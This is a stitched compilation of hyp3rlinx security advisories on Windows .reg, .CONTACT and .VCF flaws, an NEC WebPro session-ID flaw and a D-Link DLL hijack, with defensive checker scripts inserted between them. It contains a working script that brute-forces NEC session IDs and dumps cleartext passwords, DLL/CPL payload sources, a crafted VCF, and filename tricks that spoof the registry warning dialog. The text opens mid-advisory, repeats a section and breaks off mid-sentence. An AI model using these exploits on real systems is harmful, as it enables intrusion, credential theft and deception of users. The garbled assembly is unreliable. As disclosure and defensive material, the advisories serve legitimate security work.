Potentially making a user think they are cancelling the registry import as
the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another
dialog box with a status message telling us
"the keys and values contained in  have been successfully added to
the registry".

We can obstruct that behavior to deny this secondary registry editor dialog
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like:
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3; it will display an Asian char instead
but still prevents the secondary registry dialog box.
You will have to manually refresh the registry written to in order to see
the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the
dialog box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second
registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing
after a successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n"
amount of times per amount of %5 injected into the filename
%25 (Windows 7) duplicates the default registry dialog box message by "n"
amount of times per amount of %25 injected into the filename
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the
registry dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without
messing up our spoofed message, we can leverage this to obfuscate the end
of the filename.
We then use %0 to terminate the message string so that the second .reg
extension and default registry messages are not displayed in the registry
dialog box.


[FD] Microsoft Windows .Reg File / Dialog Box Message Spoofing Vulnerability

2019-03-12 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-.REG-FILE-DIALOG-BOX-MESSAGE-SPOOFING.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
A file with the .reg file extension is a Registration file used by the
Windows registry. These files can contain hives, keys, and values.
.reg files can be created from scratch in a text editor or can be produced
by the Windows registry when backing up parts of the registry.


[Vulnerability Type]
Windows .Reg File Dialog Box Message Spoofing


[CVE Reference]
N/A


[Security Issue]
The Windows registry editor allows specially crafted .reg filenames to
spoof the default registry dialog warning box presented to an end user.
This can potentially trick unsavvy users into choosing the wrong selection
shown on the dialog box. Furthermore, we can deny the registry editor
its ability to show the default secondary status dialog box (Win 10),
thereby hiding the fact that our attack was successful.

Normally when a user opens a .reg file UAC will launch; after that they will get
the registry security warning dialog box asking them if they
"trust the source" and "Are you sure you want to continue?" etc., and will
also have a choice of either 'Yes' or 'No' to select from.

However, we can inject our own messages thru the filename to direct the
user to wrongly click "Yes", as the expected "Are you sure you want to
continue?"
dialog box message is under our control. The registry dialog echoes back
the filename plus any text we add and allows us to terminate part of its
default security warning message. We achieve this using % encoded
characters in the filename like %n or %r and %0.

For example, the "do not add it to the registry" and "Are you sure you want to
continue?" default warning messages can be done away with using %0.

This spoofing flaw lets us spoof the "Are you sure you want to continue?"
warning message to instead read "Click Yes" or whatever else we like.
Potentially making a user think they are cancelling the registry import as
the security warning dialog box is now lying to them.

Denial of secondary registry editor status dialog box (hiding successful
attacks) in Windows 10:

Typically, upon a successful import the registry editor pops up another
dialog box with a status message telling us
"the keys and values contained in  have been successfully added to
the registry".

We can obstruct that behavior to deny this secondary registry editor dialog
from appearing by tacking on a (null) right before the
end of our filename using %1 or %25 like:
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"

If you don't want to use (null), use %3; it will display an Asian char instead
but still prevents the secondary registry dialog box.
You will have to manually refresh the registry written to in order to see
the values stored when using these dialog denial of service methods.

Note: Denial of the secondary dialog box seems to only work on Windows 10.

Behaviors I discovered playing with registry filenames that affect the
dialog box, depending on Windows OS version you will get different results.

% - can be used for obfuscation e.g. %h%a%t%e = hate
%b will create white-space
%n makes a newline
%r makes a newline
%1 creates (null) - important as we prevent the second registry dialog from
appearing after a successful import!
%0 Important terminates string
%25 (Windows 10) creates (null) - Important as we prevent the second
registry dialog from appearing after a successful import!
%3 - Important as we prevent the second registry dialog from appearing
after a successful import! (but shows asian char)
%5 (Windows 10) duplicates the default registry dialog box message by "n"
amount of times per amount of %5 injected into the filename
%25 (Windows 7) duplicates the default registry dialog box message by "n"
amount of times per amount of %25 injected into the filename
%2525 prevents registry editor from opening
%169 will show our junky filename in the dialog box (we don't want that)
%3, %197, %17 and some others change the default language shown in the
registry dialog box to asian characters etc

Each injected character can be separated by a percent "%" sign without
messing up our spoofed message, we can leverage this to obfuscate the end
of the filename.
We then use %0 to terminate the message string so that the second .reg
extension and default registry messages are not displayed in the registry
dialog box.
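A defender's counterpart to the rules above, added here as an example (it is not part of the advisory and not the author's code): a small checker that approximates how a .reg filename would render in the dialog and flags names whose displayed first line differs from the real name or that carry the (null)/terminator escapes listed above. The rendering rules are a simplified model of the behaviors the advisory reports (an assumption), not a reproduction of regedit's real message formatting.

```python
import re
from typing import NamedTuple

# Escape sequences the advisory reports as producing (null), terminating the
# string, or otherwise suppressing the secondary registry dialog. Flagging
# their presence is a detection heuristic (assumption), not a model of how
# regedit really formats the message.
SUPPRESSORS = ("%2525", "%25", "%0", "%1", "%3")
NULL_LIKE = ("%2525", "%25", "%1", "%3")   # rendered as (null) or junk: dropped
LAYOUT = {"%b": " ", "%n": "\n", "%r": "\n"}


class RegNameReport(NamedTuple):
    filename: str
    displayed: str       # approximate rendering up to the first %0
    first_line: str      # what the user reads as "the file name"
    suppressors: tuple   # suppressing escapes present in the raw name
    name_mismatch: bool  # displayed .reg name differs from the real one
    suspicious: bool


def approximate_display(name: str) -> str:
    """Simplified rendering of the rules listed above (assumption): a bare
    '%' separator vanishes, %b/%n/%r become whitespace, (null)-producing
    escapes are dropped and %0 terminates the string."""
    out, i = [], 0
    while i < len(name):
        if name[i] != "%":
            out.append(name[i])
            i += 1
            continue
        if name.startswith("%0", i):
            break                         # terminator: nothing after it shows
        nul = next((s for s in NULL_LIKE if name.startswith(s, i)), None)
        if nul:
            i += len(nul)
            continue
        two = name[i:i + 2]
        if two in LAYOUT:
            out.append(LAYOUT[two])
            i += 2
            continue
        i += 1                            # lone '%' splitting letters: %h%a%t%e -> hate
    return "".join(out)


def analyze_reg_filename(name: str) -> RegNameReport:
    """Flag a .reg filename whose dialog rendering would mislead the user.
    Any '%' escape in a .reg name is unusual, so false positives on odd but
    honest names are accepted."""
    displayed = approximate_display(name)
    first_line = displayed.split("\n", 1)[0].strip()
    found = tuple(s for s in SUPPRESSORS if s in name)
    name_mismatch = (name.lower().endswith(".reg")
                     and first_line.lower().endswith(".reg")
                     and first_line.lower() != name.lower())
    suspicious = bool(found) or name_mismatch or "\n" in displayed
    return RegNameReport(name, displayed, first_line, found, name_mismatch, suspicious)


if __name__ == "__main__":
    spoof = ("Microsoft-Security-Update-v1.2-Windows-10."
             "r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg")
    print(analyze_reg_filename(spoof))
```

Run against the advisory's filename, the first displayed line comes out as "Microsoft-Security-Update-v1.2-Windows-10.reg" followed by the injected "Click Yes" text on later lines, so the mismatch between rendered and real name is what a mail gateway or download scanner would key on.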

The filename
"Microsoft-Security-Update-v1.2-Windows-10.r%e%g%r%nC%l%i%c%k%b%Y%e%s%b%b%b%1%0.reg"
will show as "Microsoft-Security-Update-v1.2-Windows-10.reg"
in the registry dialog box, along with 

[FD] Microsoft Windows .CONTACT File / HTML Injection Mailto: Remote Code Execution

2019-01-25 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-HTML-INJECTION-MAILTO-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program
[+] ZDI-CAN-7591


[Vendor]
www.microsoft.com


[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're
used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default:
C:\Users\[USERNAME]\Contacts\.


[Vulnerability Type]
Mailto: HTML Link Injection Remote Code Execution


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files: the E-mail address
field is expected to take an e-mail address value, but the .CONTACT file is
vulnerable to HTML injection because no validation is performed. Therefore,
if an attacker references an executable file using an HREF tag, clicking
the link runs that executable without warning instead of performing the
expected e-mail behavior. This is dangerous and would be unexpected to an
end user.

The e-mail address's Mailto: link will then point to an arbitrary
executable, like:
p...@microsoft.com

Additionally, the executable file can live in a sub-directory and be
referenced like "p...@microsoft.com", or attackers can use directory
traversal techniques to point to malware sitting, say, in the target's
Downloads directory, like:

p...@microsoft.com

Making matters worse, if the files are compressed and then downloaded,
"mark of the web" (MOTW) may not work as expected with certain archive
utilities.

This advisory was initially one of three different vulnerabilities I
reported to the Zero Day Initiative Program (ZDI), for which Microsoft
decided not to release a security fix and closed the case. The first cases
I reported to ZDI were the .VCF and .CONTACT files' Website address input
fields.

This example is yet another vector affecting Windows .CONTACT files and is
being released as the .CONTACT file issue is now publicly known.


[Exploit/POC]
Create a Windows .CONTACT file and inject the following HTML into the
E-mail: field

p...@microsoft.com

Windows will prompt you like "The e-mail address you have entered is not a
valid internet e-mail address. Do you still want to add this address?"

Click Yes.

Open the .CONTACT file and click the Mailto: link BOOM! Windows calculator
will execute.


Attacker supplied code is not limited to .EXE, .CPL or .COM as .VBS files
will also execute! :)


[POC Video URL]
https://vimeo.com/312824315


[Disclosure Timeline]
Reported to ZDI 2018-11-22 (ZDI-CAN-7591)
Another separate vulnerability affecting MS Windows .contact files affected
the Website address input fields and was publicly disclosed January 16,
2019.
https://www.zerodayinitiative.com/advisories/ZDI-19-121/
Public disclosure : January 22, 2019



hyp3rlinx



[FD] Microsoft Windows ".contact" File / Insufficient UI Warning Arbitrary Code Execution

2019-01-18 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CONTACT-FILE-INSUFFECIENT-UI-WARNING-WEBSITE-LINK-ARBITRARY-CODE-EXECUTION.txt
[+] ISR: ApparitionSec


[Vendor]
www.microsoft.com


[Product]
Microsoft .CONTACT File

A file with the CONTACT file extension is a Windows Contact file. They're
used in Windows 10, Windows 8, Windows 7, and Windows Vista.
This is the folder where CONTACT files are stored by default:
C:\Users\[USERNAME]\Contacts\.


[Vulnerability Type]
Insufficient UI Warning Arbitrary Code Execution


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The flaw is due to the processing of ".contact" files  node param
which takes an expected website value; however, if an attacker references
an executable file, clicking the link runs that executable without warning
instead of performing the expected web navigation. This is dangerous and
would be unexpected to an end user.

e.g.


www.hyp3rlinx.altervista.com

Executable files can live in a sub-directory, so when the ".contact"
website link is clicked it traverses directories towards the executable
and runs it. Making matters worse, if the files are compressed and then
downloaded, "mark of the web" (MOTW) may not work as expected with certain
archive utilities.

The ".\" chars allow directory traversal to occur in order to run the
attacker-supplied executable sitting unseen in the attacker's directory.
This advisory is a duplicate of an issue that currently affects Windows
.VCF files, and is released for the sake of completeness as it affects
Windows .contact files as well.


[Exploit/POC]
Rename any executable file extension from ".exe" to ".com" to be like a
valid web domain name.
Create a directory to house the executable file
Modify the contact file website link like --->
http.\\www..com
Contact website link now points at "dir .\ executable"  --->
http.\\www..com
Compress the files using archive utility and place in webserver for
download.


[POC Video URL]
https://vimeo.com/311759191


[Disclosure Timeline]
Reported to ZDI 2018-11-30
This exact same vulnerability exists and affects Microsoft Windows .VCF
files sharing the same root cause and was publicly disclosed 2019-01-10.
https://www.zerodayinitiative.com/advisories/ZDI-19-013/
Public disclosure : January 16, 2019




hyp3rlinx



[FD] Microsoft VCF File Insufficient UI Warning Remote Code Execution 0day

2019-01-11 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-VCF-FILE-INSUFFICIENT-WARNING-REMOTE-CODE-EXECUTION.txt
[+] ISR: ApparitionSec
[+] Zero Day Initiative Program



[Vendor]
www.microsoft.com


[Product]
A VCF file is a standard file format for storing contact information for a
person or business.
Microsoft Outlook supports the vCard and vCalendar features. These are a
powerful new approach to electronic Personal Data Interchange (PDI).



[Vulnerability Type]
Insufficient UI Warning Remote Code Execution



[CVE Reference]
ZDI-19-013
ZDI-CAN-6920


[Security Issue]
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Microsoft Windows.
User interaction is required to exploit this vulnerability in that the
target must visit a malicious page or open a malicious file.

The specific flaw exists within the processing of VCard files. Crafted data
in a VCard file can cause Windows to display a dangerous hyperlink.
The user interface fails to provide any indication of the hazard.

An attacker can leverage this vulnerability to execute code in the context
of the current user.


[Exploit/POC]
1) create a directory and name it "http" this will house the .CPL
executable file.


2) create a .CPL file and give it a website name, I named mine
"www.hyp3rlinx.altervista.cpl"
or whatever website you wish so it can be referenced in the VCF file.

#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 hyp3rlinx.altervista.c
gcc -shared -m32 -o hyp3rlinx.altervista.cpl hyp3rlinx.altervista.o
*/

/* PoC payload: only raises a message box to prove the .CPL was loaded */
void ms_vcf_0day(){
    MessageBox(0, "Continue with install?", "TrickyDealC0der :)",
               MB_YESNO + MB_ICONQUESTION);
}

/* Entry point the loader calls on every process/thread attach and detach */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            ms_vcf_0day();
            break;
    }
    return TRUE;
}



3) make sure to rename the executable .DLL extension to a .CPL extension if
you did not follow compile instructions above to output as ".CPL".
e.g. hyp3rlinx.altervista.dll --> hyp3rlinx.altervista.cpl



4) Create a .VCF mail file; I named mine "trickyDealC0der.vcf"

For the URL in the .VCF Mail file specify a URL like...
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl

The Windows .VCF File content:

"trickyDealC0der.vcf"

BEGIN:VCARD
VERSION:4.0
N:Tricky;DealC0der;;;
FN:TrickyDealC0der
EMAIL;TYPE=home;PREF=1:M$@PwnedAgain.com
TEL;TYPE="cell,home";PREF=1:tel:+000-000-
ADR;TYPE=home;PREF=1:;;1 NYC;NY;;WC2N;USA
URL;TYPE=home;PREF=1:http.\\www.hyp3rlinx.altervista.cpl
END:VCARD



Now, open the "trickyDealC0der.vcf" file and click the website link, the
VCF file will traverse back one to the "http" directory where
our CPL executable file lives and KABOOM! :)
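The three advisories above (.CONTACT e-mail field HTML injection, .CONTACT website link traversal, and the .VCF URL property) share one root symptom: a field that should hold an address or URL holds markup, a path step, or an executable name instead. The following scanner is an added example, not code from the advisories or their author, that checks both file types for exactly those values. It assumes a Windows .contact file is XML under the schemas.microsoft.com/Contact namespace with Address and Value elements (the samples and element names are constructed), walks every text node so that it does not depend on exact element names, and unfolds vCard continuation lines before inspecting URL and EMAIL properties.

```python
import re
import xml.etree.ElementTree as ET

# Heuristic patterns (assumption: illustrative, not exhaustive). ".com" is
# deliberately absent from EXEC_EXT because it is also a TLD; the traversal
# and malformed-scheme checks catch the "renamed .exe -> .com" trick.
EXEC_EXT = re.compile(r"\.(exe|cpl|vbs|scr|bat|cmd|hta|js)\b", re.I)
TRAVERSAL = re.compile(r"\.{1,2}[\\/]|\\\\")
HTML_TAG = re.compile(r"<\s*/?[a-z][^>]*>", re.I)
SAFE_URL = re.compile(r"^(https?://|mailto:)", re.I)


def suspicious_link_value(value: str) -> list:
    """Reasons a contact's URL or e-mail value should not be trusted as a link."""
    v = value.strip()
    reasons = []
    if HTML_TAG.search(v):
        reasons.append("html-markup")           # markup where an address belongs
    if EXEC_EXT.search(v):
        reasons.append("executable-extension")  # .cpl/.exe/.vbs... in a "website"
    if TRAVERSAL.search(v):
        reasons.append("path-traversal")        # .\ or ..\ walks into a directory
    if re.match(r"https?", v, re.I) and not SAFE_URL.match(v):
        reasons.append("malformed-scheme")      # "http.\" instead of "http://"
    return reasons


def scan_contact_xml(xml_text: str) -> list:
    """Walk every text node of a .contact file (assumption: XML, as Windows
    Contacts stores it). Returns (element local name, value, reasons)."""
    findings = []
    for el in ET.fromstring(xml_text).iter():
        if el.text and el.text.strip():
            reasons = suspicious_link_value(el.text)
            if reasons:
                local_name = el.tag.rsplit("}", 1)[-1]
                findings.append((local_name, el.text.strip(), reasons))
    return findings


def scan_vcard(text: str) -> list:
    """Unfold continuation lines, then check URL and EMAIL properties."""
    lines = []
    for raw in text.splitlines():
        if raw[:1] in (" ", "\t") and lines:
            lines[-1] += raw[1:]                # folded line continues the previous one
        else:
            lines.append(raw)
    findings = []
    for line in lines:
        if ":" not in line:
            continue
        prop, value = line.split(":", 1)
        name = prop.split(";", 1)[0].strip().upper()
        if name in ("URL", "EMAIL"):
            reasons = suspicious_link_value(value)
            if reasons:
                findings.append((name, value.strip(), reasons))
    return findings


# Constructed samples (not the advisories' files); element names assumed.
CONTACT_SAMPLE = """<c:contact xmlns:c="http://schemas.microsoft.com/Contact">
  <c:NameCollection><c:Name><c:FormattedName>Support Desk</c:FormattedName></c:Name></c:NameCollection>
  <c:EmailAddressCollection><c:EmailAddress>
    <c:Address>&lt;a href="..\\Downloads\\update.exe"&gt;support@example.com&lt;/a&gt;</c:Address>
  </c:EmailAddress></c:EmailAddressCollection>
  <c:UrlCollection><c:Url><c:Value>http.\\www.example-update.cpl</c:Value></c:Url></c:UrlCollection>
</c:contact>"""

VCARD_SAMPLE = "\n".join([
    "BEGIN:VCARD",
    "VERSION:4.0",
    "FN:Support Desk",
    "EMAIL;TYPE=home;PREF=1:support@example.com",
    "URL;TYPE=home;PREF=1:http.\\www.example-update.cpl",
    "END:VCARD",
])

if __name__ == "__main__":
    for hit in scan_contact_xml(CONTACT_SAMPLE) + scan_vcard(VCARD_SAMPLE):
        print(hit)
```

The same value checker serves both formats; a mail gateway or endpoint agent that already unpacks archives can run it before the file reaches the Contacts folder, which matters because, as the advisories note, MOTW may not survive some archive utilities.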



[References]
https://www.zerodayinitiative.com/advisories/ZDI-19-013/



[Network Access]
Remote



[POC Video URL]
https://vimeo.com/310684003



[Disclosure Timeline]
Notification: Trend Micro Zero Day Initiative Program
2018-07-23 - Vulnerability reported to vendor
2019-01-10 - Coordinated public release of advisory
2019-01-10 - Advisory Updated

ADDITIONAL DETAILS
08/06/18 - ZDI reported the vulnerability to the vendor
08/07/18 - The vendor acknowledged the report and provided a tracking #
10/01/18 – The vendor requested an additional file
10/03/18 – ZDI provided added files and a new PoC
10/03/18 – The vendor advised the report did not meet the bar for service
10/05/18 – ZDI advised that we believe the report is exploitable and
notified the vendor of the intent to 0-day on 10/16/18
10/08/18 – The vendor advised ZDI they had re-considered a fix and
requested an extension to 01/08/19
10/09/18 – ZDI agreed to the short extension
11/14/18 – The vendor again advised ZDI of the target patch date 01/08/19
12/12/18 – The vendor provided ZDI a CVE
12/19/18 - The vendor wrote to ZDI to advise that “engineering team had
decided to pursue the fix as v.Next” and “Microsoft has decided that it
will not be fixing this vulnerability and we are closing this case”
12/27/18 – ZDI notified the vendor of the intent to 0-day on 01/07/18




[FD] CVE-2018-11741 / CVE-2018-11742 / NEC Univerge Sv9100 WebPro - 6.00 / Predictable Session ID / Clear Text Password Storage

2018-12-04 Thread hyp3rlinx
[+] Credits: hyp3rlinx
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/NEC-UNIVERGE-WEBPRO-v6.00-PREDICTABLE-SESSIONID-CLEARTEXT-PASSWORDS.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo B. 0day***


[Vendor]
www.necam.com


[Affected Product Code Base]
NEC Univerge Sv9100 WebPro - 6.00.00


NEC Univerge WebPro is a web-based programming tool for the NEC Switch,
which is used to program corporate telephone systems.


Public facing installations as of Dec 1, 2018
https://www.shodan.io/search?query=Server+Henry
Result: 7,797


[Vulnerability Type(s)]
[CVE Reference(s)]
Predictable Session ID - CVE-2018-11741 / Cleartext Password Storage -
CVE-2018-11742



[Attack Vectors]
Make repeated remote HTTP requests until arriving at a valid authenticated
sessionId.


Security Issue:

NEC Univerge WebPro suffers from a "Predictable Session ID" that can
potentially disclose all user account information, including passwords
stored in clear text in the Web UI.
Attackers can simply increment numbers until arriving at a live session,
then, by using a specific URI, dump the entire account information for all
users, including the clear-text passwords.

e.g.

curl  http://NEC-VICTIM-IP/Home.htm?sessionId=12959(8)
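What makes the session ID above guessable is its keyspace: a five-digit counter is exhausted in about as many requests as the PoC below issues. Added here as an example (not the advisory's or the vendor's code), the assessment function takes a sample of observed numeric session IDs and reports whether they are sequential and how many bits of effective keyspace the sample spans; the 64-bit threshold and the 100-step "sequential" window are assumed review thresholds. The companion function shows what a server should issue instead.

```python
import math
import secrets


def assess_session_ids(ids, min_bits=64, max_step=100):
    """Predictability check over a sample of numeric session IDs, the kind
    the advisory describes. Thresholds are assumptions: below min_bits of
    effective keyspace, or strictly increasing in small steps, counts as
    predictable."""
    nums = [int(i) for i in ids]
    if len(nums) < 2:
        raise ValueError("need at least two samples")
    deltas = [b - a for a, b in zip(nums, nums[1:])]
    span = max(nums) - min(nums) + 1
    effective_bits = math.log2(span)       # every value in [min, max] is a candidate
    sequential = all(0 < d <= max_step for d in deltas)
    return {
        "samples": len(nums),
        "distinct": len(set(nums)),
        "sequential": sequential,
        "max_step": max(abs(d) for d in deltas),
        "effective_bits": effective_bits,
        "predictable": sequential or effective_bits < min_bits,
    }


def new_session_id() -> str:
    """What the server should hand out instead: 128 bits from the OS CSPRNG,
    which no amount of incrementing will land on."""
    return secrets.token_hex(16)


if __name__ == "__main__":
    # Constructed sample: ten IDs observed over ten logins on a counter-based server.
    print(assess_session_ids(range(12950, 12960)))
    print(new_session_id())
```

A sample of sequential five-digit IDs comes out at roughly 3.3 effective bits and is reported as predictable; the fix on the server side is the second function, plus binding the session to the login rather than exposing it as a URL parameter.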


Exploit/POC:
=
from socket import *
import re

#Univerge Sv9100 NEC WebPro : 6.00
#Dumps user accounts and plaintext passwords stored in Web UI in
#'Administrator Programming Password Setup' webpage
#http://TARGET-IP/Home.htm?sessionId=12959(8) "GOTO(8)" will retrieve
#all account usernames and cleartext passwords.

print "NEC Univerge Sv9100 WebPro - 6.00.00 / Remote 0day Exploit POC"
print "hyp3rlinx"


IP=raw_input("[+] TARGET> ")
res=''
findme="Programming Password Setup"
cnt=0
tmp=False
tmp2=False
pwned=False

#check application is NEC and vuln version
def is_NEC_webpro(u):
    global tmp,tmp2,cnt
    res=''
    cnt+=1
    s=socket(AF_INET, SOCK_STREAM)
    s.connect((IP,80))
    s.send('GET '+u+' HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')

    while True:
        res=s.recv(4048)
        if res.find('')!=-1:
            break
    s.close()

    if re.findall(r"\bWebPro\b", res):
        tmp=True
        if tmp and cnt < 3:
            is_NEC_webpro('/Login.htm')
    if re.findall(r"\b6.00.00\b", res) and re.findall(r"\bNEC Corporation of America\b", res):
        tmp2 = True
    if tmp == True and tmp2 == True:
        return True
    return False



def dump(acct):
    file=open('NEC-Accounts.txt', 'w')
    file.write(acct+'\n')
    file.close()


def breach(sid):
    global pwned
    try:
        s=socket(AF_INET, SOCK_STREAM)
        s.connect((IP,80))
        sid=str(sid)
        print 'trying sessid '+sid
        s.send('GET /Home.htm?sessionId%3d'+sid+'(8)%20HTTP/1.1\r\nHost: '+IP+'\r\n\r\n')
    except Exception as e:
        print str(e)

    while True:
        res = s.recv(4096)
        if res.find('')!=-1:
            break
        if re.findall(r"\bProgramming Password Setup\b",res)!=-1: ## We hit an active session.
            dump(res)
            print res
            pwned=True

    s.close()
    return pwned


def sessgen():
    for sessid in range(1000,15000): ##test 14109
        if breach(sessid):
            break


if __name__=='__main__':
    if is_NEC_webpro('/'):
        sessgen()
    else:
        print 'Not NEC or version not vuln.'





Network Access:
===
Remote



Severity:
=
High



Disclosure Timeline:
=
Vendor Notification:  May 15, 2018
No reply
Vendor Notification: May 18, 2018
No reply
Vendor Notification:  June 4, 2018
No reply
Mitre assign CVE: June 5, 2018
JPCERT replies: June 6, 2018
JPCERT shares information with NEC : June 7, 2018
Request status : August 11, 2018
JPCERT contact NEC : August 14, 2018
No reply from vendor
Request status : August 21, 2018
JPCERT again contacts NEC : August 21, 2018
JPCERT "vendor working on a release" : August 23 2018
JPCERT "Vendor release October 2018" : September 12, 2018
NEC "Requests public disclosure after December 1st." : November 19, 2018
December 2, 2018 : Public Disclosure




[FD] CVE-2018-15515 / D-LINK Central WifiManager CWM-100 / Trojan File SYSTEM Privilege Escalation

2018-11-09 Thread hyp3rlinx
[+] Credits: John Page (aka hyp3rlinx)
[+] Website: hyp3rlinx.altervista.org
[+] Source:
http://hyp3rlinx.altervista.org/advisories/DLINK-CENTRAL-WIFI-MANAGER-CWM-100-SYSTEM-PRIVILEGE-ESCALATION.txt
[+] ISR: ApparitionSec


***Greetz: indoushka | Eduardo B.***



[Vendor]
us.dlink.com


[Product]
D-LINK Central WifiManager (CWM 100)
Version 1.03 r0098
http://us.dlink.com/products/business-solutions/central-wifimanager-software-controller/

D-Link’s free Central WiFiManager is a web-based wireless Access Point
management tool, enabling you to create and manage multi-site,
multi-tenancy wireless networks.


[Vulnerability Type]
Trojan File SYSTEM Privilege Escalation


[Affected Component]
"quserex.dll"


[CVE Reference]
CVE-2018-15515


[Security Issue]
D-Link Central WiFiManager CWM-100 1.03 r0098 devices will load a Trojan
horse "quserex.dll" and will create a new thread running with SYSTEM
integrity.


[Impact]
Code Execution as SYSTEM


[Exploit/POC]
1) Create 32bit DLL named "quserex.dll" and place in "CaptivelPortal.exe"
directory under the DLINK directory

2) Restart the service "CaptivelPortal"

3) Proof, examine using process monitor (sysinternals)


#include <windows.h>

/* hyp3rlinx */

/*
gcc -c -m32 quserex.c
gcc -shared -m32 -o quserex.dll quserex.o
*/

/* PoC payload: only raises a message box to prove the DLL was loaded */
void executo(){
    MessageBox(NULL, "Enjoy ur SYSTEM Integrity!", ":)", MB_OK);
}

/* Entry point the loader calls on every process/thread attach and detach */
BOOL WINAPI DllMain(HINSTANCE hinstDLL, DWORD fdwReason, LPVOID lpvReserved){
    switch(fdwReason){
        case DLL_PROCESS_ATTACH:
        case DLL_PROCESS_DETACH:
        case DLL_THREAD_ATTACH:
        case DLL_THREAD_DETACH:
            executo();
            break;
    }
    return TRUE;
}
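Step 3 of the PoC points at Process Monitor as the way to see the load happen; the same telemetry is how a defender finds this class of issue before anyone plants a file. The following is an added example, not the advisory's or D-Link's code, that reads a Process Monitor CSV export and lists every .dll that a privileged process probed for and did not find, ranking probes outside %SystemRoot% (typically the application's own directory) first because those are the locations whose ACLs need checking. The CSV column layout is assumed to be Procmon's default export plus the optional User column; the log lines and the install path are constructed, not captured from a real host.

```python
import csv
import io

# Assumption: Process Monitor CSV export with its default columns plus "User".
# Constructed log lines; the DLINK path is a placeholder, not the real install path.
PROCMON_CSV = """\
"Time of Day","Process Name","PID","Operation","Path","Result","Detail","User"
"10:01:02.1","CaptivelPortal.exe","1234","CreateFile","C:\\Program Files\\DLINK\\CaptivelPortal\\quserex.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\\SYSTEM"
"10:01:02.2","CaptivelPortal.exe","1234","CreateFile","C:\\Windows\\System32\\quserex.dll","NAME NOT FOUND","Desired Access: Read Attributes","NT AUTHORITY\\SYSTEM"
"10:01:02.3","CaptivelPortal.exe","1234","CreateFile","C:\\Windows\\System32\\kernel32.dll","SUCCESS","Desired Access: Read Data","NT AUTHORITY\\SYSTEM"
"10:01:02.4","CaptivelPortal.exe","1234","CreateFile","C:\\Program Files\\DLINK\\CaptivelPortal\\settings.ini","NAME NOT FOUND","Desired Access: Read Data","NT AUTHORITY\\SYSTEM"
"10:01:03.0","notepad.exe","4321","CreateFile","C:\\Users\\bob\\Desktop\\notes.txt","SUCCESS","Desired Access: Generic Read","HOST\\bob"
"""


def find_dll_hijack_candidates(csv_text, privileged_users=("NT AUTHORITY\\SYSTEM",)):
    """Flag CreateFile probes for .dll files that failed with NAME NOT FOUND
    in a privileged process: each is a location where a file of that name
    would be picked up by the loader's search order. Returns tuples of
    (process, path, user, outside_windows_dir)."""
    hits = []
    for row in csv.DictReader(io.StringIO(csv_text)):
        if row["Operation"] != "CreateFile" or row["Result"] != "NAME NOT FOUND":
            continue
        path = row["Path"]
        if not path.lower().endswith(".dll") or row["User"] not in privileged_users:
            continue
        # Probes outside %SystemRoot% are the ones whose directory ACLs to audit first.
        outside_windows = not path.lower().startswith("c:\\windows\\")
        hits.append((row["Process Name"], path, row["User"], outside_windows))
    hits.sort(key=lambda h: not h[3])       # application-directory probes first
    return hits


if __name__ == "__main__":
    for hit in find_dll_hijack_candidates(PROCMON_CSV):
        print(hit)
```

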